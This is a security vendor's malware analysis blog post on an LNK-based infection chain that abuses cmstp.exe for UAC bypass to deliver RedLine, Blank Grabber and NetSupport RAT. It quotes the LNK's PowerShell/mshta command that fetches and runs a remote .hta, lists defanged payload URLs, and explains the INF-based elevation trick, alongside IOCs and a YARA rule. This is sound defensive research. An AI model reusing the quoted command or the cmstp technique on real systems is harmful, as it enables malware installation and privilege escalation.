Unveiling the Stealthy Exploitation of Microsoft CMSTP Using Malicious LNK Files

Key Takeaways

  • The blog highlights an infection chain that leverages the Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass.
  • Similar VBScript and PowerShell scripts were used in past campaigns to deliver Invicta Stealer without leveraging CMSTP, indicating that attackers might have updated TTPs.
  • The infection chain begins with a .zip or .iso file and progresses through multiple stages involving distinct malware payloads, initially starting with a ‘.lnk’ file.”
  • The scripts employed in the intermediate stages are executed on the fly to be evasive.

Executive Summary

In early 2022, Microsoft made an announcement asking users to disable macros by default in Office documents downloaded from the Internet. In response, TAs shifted away from utilizing malicious macros for initial access. Instead, they began favoring various executable attachments. TAs started depending more on malicious LNK files as the preferred method for initial access, enabling them to download and execute payloads. During this timeframe, Cyble Research and Intelligence Labs (CRIL) also discovered an LNK builder named “Quantum Lnk Builder” being offered on cybercrime forums.

We also observed a campaign that involved an infection sequence, utilizing Microsoft’s cmstp.exe for proxy execution. This campaign identified multiple malware families, all utilizing cmstp.exe to execute malicious payloads. Recently, CRIL uncovered the infection method of Invicta Stealer. Interestingly, we discovered that this campaign employs a similar script for fetching malware payloads. However, the infection chain used to deliver Invicta stealer does not involve cmstp.exe, which suggests the TAs might have evolved their TTPs.

We suspect that TAs might be employing spam emails to disseminate malicious attachments. This campaign’s infection chain commences with a malicious .zip or .iso file. Within these files, a lnk file serves as the trigger for a remote VBScript.

The VBScript facilitates de-obfuscation and initiates the execution of a PowerShell Loader, subsequently activating a PowerShell downloader. This downloader retrieves a malware payload and sometimes also downloads a decoy file. Additionally, a malicious .inf file is dropped. Upon execution through cmstp.exe, this .inf file becomes the conduit for launching the malware payload. The figure below shows the infection chain.

Infection chain, CMSTP
Figure 1 – Infection Chain

 

Initial Infection

The initial infection commences with a .zip or .iso file. These files contain a malicious .lnk file, often disguised as a PDF. This lnk file initiates a command execution, leading to the remote execution of an .hta file. For example, in one of the cases, the following command is executed by an lnk file: “C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S2\mh?a.* ‘http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta’“.

This command references a potentially malicious .hta file hosted on a remote server. The figure below shows the .lnk file.

LNK File, Microsoft, CMSTP
Figure 2 – Lnk File

This command will launch mshta.exe and execute the remote file located at “‘http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta'”. This file uses multiple layers of obfuscation to hide the malicious VBScript.

The figure below shows the process tree.

Process Tree, LNK file, CMSTP
Figure 3 – Process Tree

Technical Analysis

The .hta file executed by the .lnk file consists of VBScript. In this campaign, we primarily observed two distinct obfuscation techniques employed on VBScript. Regardless of the obfuscation method applied, all the VBScripts delivered a similar PowerShell loader.

First Obfuscation Technique

In this obfuscation approach, the TA employs a tactic to obscure information by manipulating arrays of integer values. It performs subtraction operations on these arrays with a constant value – for example, the value is 44536 for this obfuscation layer.

The figure below shows the decoding routine in the .hta file.

Obfuscation Technique
Figure 4 – First Obfuscation Technique

 

The TA has hardcoded integer values into two arrays, which are subsequently converted into their corresponding ASCII characters. The first array consists of a PowerShell script, and the second array decodes to ‘Wscript.Shell’. The script will utilize the WScript.Shell.Run method to execute the PowerShell script. The figure below displays the decoded content of the .hta file.

Decoded Content
Figure 5 – Decoded Content

To fetch the content of the next stage PowerShell loader, we created a simple Python script. This script consists of an array, assigned with integer values and a constant.

The figure below shows the Python script.

Python Script
Figure 6 – Python Script

 

Second Obfuscation Technique

This obfuscation technique involves numeric calculations to obtain ASCII values. However, a unique aspect of this technique is the subtraction performed between a decimal value and a hexadecimal value prefixed with “&H”. This prefixed hexadecimal value is subsequently converted into its decimal equivalent. After de-obfuscating the data, it is executed using the Execute function.

Obfuscation Technique
Figure 7 – Second Obfuscation Technique

PowerShell Loader

The PowerShell script shown in the figure below contains encrypted data stored within a variable. The AES (Advanced Encryption Standard) algorithm has encrypted the data. The script’s purpose is to decrypt this encrypted data and subsequently decompress it. The resulting content forms a next-stage PowerShell Downloader, which is then piped to another instance of the PowerShell process.

PowerShell Script
Figure 8 – PowerShell Script

We authored a Python script to fetch the content of the next Stage Downloader. The figure below shows the Python script.

Python Script
Figure 9 – Python Script

 

PowerShell Downloader

The content within the PowerShell downloader is divided into distinct segments, employing diverse encoding techniques. Additionally, the script encompasses multiple arrays that undergo de-obfuscation using the same approach illustrated in Figure 4.

For example, in one of the cases, these arrays translated into the subsequent strings:

  • Hidden
  • WebClient/
  • hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
  • hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe

The figure below shows the final PowerShell Downloader.

PowerShell Downloader
Figure 10 – PowerShell Downloader

This script downloads files from the following URLs and saves them to the “AppData\Roaming” directory while preserving their original names.

  • hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
  • hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe

The figure below shows the network activity.

Network Activity
Figure 11 – Network Activity

It downloads one clean PDF file and a RedLine stealer binary. It also opens the clean PDF to hide its malicious behavior. The figure below shows the PDF file.

Clean PDF, CMSTP
Figure 12 – Clean PDF File

 

Leveraging CMSTP

The PowerShell downloader leverages cmstp.exe for proxy execution and UAC bypass. It uses the Set-INFFile function to create an INF (Information) file. It takes parameters like the location of the INF file ($InfFileLocation) and a command to execute ($CommandToExecute).

It drops a malicious .inf file named “CMSTP.inf” into the %temp% directory and initiates its execution by starting the cmstp process (Connection Manager Profile Installer) with arguments “/au” and “$InfFileLocation”, as shown in Figure below.

CMSTP
Figure 13 – Executes CMSTP

In this case, the script attempts to leverage the cmstp process to execute commands without triggering a UAC prompt. The RunPreSetupCommandSection in the INF file consists of the path to the malware payload. Therefore, when the cmstp.exe is spawned with the malicious INF as the argument, it executes the malware payload with elevated privileges. Subsequently, it installs a fabricated connection manager service profile labeled as ‘Notepad.

The figure below shows the malicious “.inf” file.

INF File
Figure 14 – INF File

Malware Payloads

Blank Grabber

Blank Grabber is an open-source stealer coded in Python. This stealer is equipped with a GUI builder, which can be used to conveniently generate a stealer payload. The builder provides the option to customize stealer payloads such as UAC bypass, custom icon, and startup execution for persistence.

It has multiple anti-VM functions. It employs obfuscated code, fake errors, and EXE binding to conceal itself while capturing browser data, Discord tokens, gaming sessions, passwords, and cookies. Additionally, it steals system info, IP details, webcam images, and crypto wallets, forwarding all data through Discord Webhooks or Telegram Bot.

The figure below depicts the strings associated with BlackGrabber found within the binary delivered in this campaign:

Blank Grabber
Figure 15 – Blank Grabber Strings

Redline Stealer

RedLine Stealer is one of the most prominent InfoStealers in cyberspace. It is sold on cybercrime forums and can steal data and introduce additional malware to operating systems. Cybercriminals deploy it to gain unauthorized access to sensitive information like logins, passwords, autofill data, and credit card details from Gecko and Chromium browsers. Detailed analysis of Redline Stealer can be found here.

Apart from the domain mentioned in the initial analysis, we found that the following domains were delivering Redline Stealer binary:

  • hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe
  • hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe

NetSupport RAT

NetSupport Manager, a commercially available RAT (Remote Administration Tool), is primarily intended for legitimate remote access to user computers by administrators. Regrettably, TAs also misuse this tool to gain unauthorized access to compromised systems. Security Researcher Kostas identified an instance where NetSupportRAT was executed using cmstp, and we encountered several similar cases as well. We observed the following URL spreading NetSupportRAT:

hxxps://montec-shop[.]de/images/client32[.]exe

Conclusion

The adoption of Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass serves as a significant illustration of the attacker’s adaptability. The pervasive use of obfuscation methods alongside the integration of multi-stage attack sequences underscores the perpetrators’ persistent pursuit of evasive maneuvers.

Previously, we’ve encountered tools like the Quantum Lnk Builder, which were available for purchase on cybercrime forums. These tools are designed to generate malicious LNK files, and their accessibility has undoubtedly facilitated TAs’ pursuits. The presence of such utilities streamlines the process for TAs to experiment with various techniques and deploy different types of attacks.

Our Recommendations

• In this campaign, where malicious INF files are being distributed and executed via CMSTP.exe, we recommend that organizations block the execution of CMSTP.exe under specific circumstances. This involves detecting instances where the command line parameter of CMSTP.exe includes both the ‘/au’ flag and the ‘\AppData\Local\Temp’ string.
• The initial infection occurs via spam email. Therefore, it is advisable to deploy effective email filtering solutions to identify and prevent the delivery of malicious attachments.

MITRE ATT&CK® Techniques

Tactic  Technique ID  Technique Name 
Execution T1204

 

User Execution
Persistence T1547
Privilege Escalation T1548.002 Bypass User Account Control
Defense Evasion  T1027

T1036

T1218.003

Obfuscated Files or Information
MasqueradingSystem Binary Proxy Execution: CMSTP
Credential Access     T1528

T1555

Steal Application Access Token

Credentials from Password Stores

Discovery     T1010

T1083

Application Window Discovery

File and Directory Discovery

 

Collection  T1005 Data from the Local System
Command and Control     T1071 Application Layer Protocol

 

Indicators of Compromise (IOCs)

Indicators Indicator Type Description
110ea5727b750a69876de6613ba71c8f80ededd2e7cef2a276a855082affcd9f SHA256 Blank Grabber
https[:]//transfer.sh/iATCFJFn3d/Video_of%20Dollar_Recalling.exe URL Malicious URL
a6c163e45059640158828422622606f0d1608bb61ed0cb3cb27a138fe1c50c6d SHA256 Malicious HTA File
hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe URL Malicious URL
hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe URL Malicious URL
27fd34dae9c30605a0739011fce957acd40c679b1b19a079946c4a6e6a0445f9 MD5

SHA1

SHA256

Redline Stealer
513bc40cedbb94ee65afe77dac8464bb2693a098a15a08bb68a761acec223cdd SHA256 Redline Stealer
3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 SHA256 Malicious Lnk File
bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 SHA256 Malicious Lnk File
9905c430c3aa6e909c773af010ef8045521aba759d20a036ce065d8bf88eb9ee SHA256 Malicious HTA File
49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 SHA256 NetSupportManager
hxxps://montec-shop[.]de/images/client32[.]exe URL Malicious URL
hxxp[:]//94.156.253[.]17/Downloads/careabout[.]hta URL Malicious URL
6f08017be2fb3359cc15e2325e934465a9e7257657809f712c85f51a568e9dfc SHA256 Malicious Lnk File
0786f1889d5f3f73b5d25289b2d9d8f6a578758bc6987f88d8ae7c81c2baacd9 SHA256 Malicious Lnk File
e9abe79fceded092601af33d75859030242fd1e9ad4978cd1ceba5d9e9d88d7e SHA256 Malicious Lnk File
de3d0a11dec2e3b4afce991a690024e96dca389f8a0a3c6a65b559c9f1c12d59 SHA256 Malicious Lnk File
f9446736df6a16ba5747b617d8f69a327ec150a07f7e0adb944b65e23c2fcdc9 SHA256 Malicious Lnk File
8f65f6a346f568171760ce5b747bd6177a2e0111d37a3df5047905c4f1f86346 SHA256 Malicious Lnk File
687baa62d88a16ae54e4ff3ad584a5c7bdf71121a0fc84d863363f064cd6053b SHA256 Malicious Lnk File
1126845e909b7c776e5b48bf64db24f19b0183b7204f50aedfb8ecba52c8dcbb SHA256 Malicious Lnk File
c2807549c5965cf165839b876f8dd3ea44d51478e4cdc4dcca6146b223b0066d SHA256 Malicious Lnk File
cf8decdb1efe459a0e8d5817d209cfdd27731694956db3e111f1f8cb32456a7a SHA256 Malicious Lnk File
837f7e7a6799e25767839e487d97a5b61d9dc43add143e4b3680d756fefc1b95 SHA256 Malicious Lnk File
845087bb407b34d8003174a3b63b6c50c7ab4b13ef81636b8344740bb7a8559c SHA256 Malicious Lnk File
a2dfcc3e26858a9c730b7c10b55f82ae4dcea1a35826cfbe992287df80c4929b SHA256 Malicious Lnk File
84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef SHA256 Malicious Lnk File
59b392a0ff9a3ff064b5a4ab90de5b68c758429280c612fd08f9399475d3108d SHA256 Malicious Lnk File
48cffc07e026c38234b77ca74d30a07a01f16da9d8ab24be73c934d6972f0ace SHA256 Malicious Lnk File
cc652a2be3f935f1bf3c40f7033239e09357da22f98b6abcab17bbb34266a02a SHA256 Malicious Lnk File
bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 SHA256 Malicious Lnk File
df86358f815e4c6760f5005a283c5e842dd7091dc328ac0f73b7667f6754c8bc SHA256 Malicious Lnk File
3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 SHA256 Malicious Lnk File
8b6ea98bb931bf67bcea0ff67cc5d44d956a4b3fffd1817e1f3ad89696fb3798 SHA256 Malicious Lnk File
f602321b7a764a0dffe32d9dfbac7c221fcf200f13d20e4fbfe978d56496a72b SHA256 Malicious Lnk File
d1825f07b07560f8d76c8d9125fc3029a4b328ecca836d01b5934ff8f02a32e1 SHA256 Malicious Lnk File
a08c36812818618f44782c3677c8b8b8159a1beacbad66adbe232e694d91176e SHA256 Malicious Lnk File
e9cbfe72cf4bf807f57df16611bea622c77ad501ee85c39ed171b8cdb05ba092 SHA256 Malicious Lnk File
3a00180db6da59cc44933db6faa043b1ae770098a4eb52d5c2f4cf060cb60d72 SHA256 Malicious Lnk File
7fd01399dec681c37cd14edeb37c601a85e1a3e567d0ff2accca1dad4bc9c53b SHA256 Malicious Lnk File

 

YARA Rule

{

strings:

$magic = {4C 00 00 00 01 14 02 00}

$a1 = “m*h?a” ascii wide nocase

$a2 = “m*h*a*” ascii wide nocase

$a3 = “.vbs” ascii wide nocase

$a4 = “powershell” ascii wide nocase

$a5 = “.hta” wide nocase

 

condition:

$magic at 0  and ($a1 or $a2) and ($a3 or $a4 or $a5)

}

Scroll to Top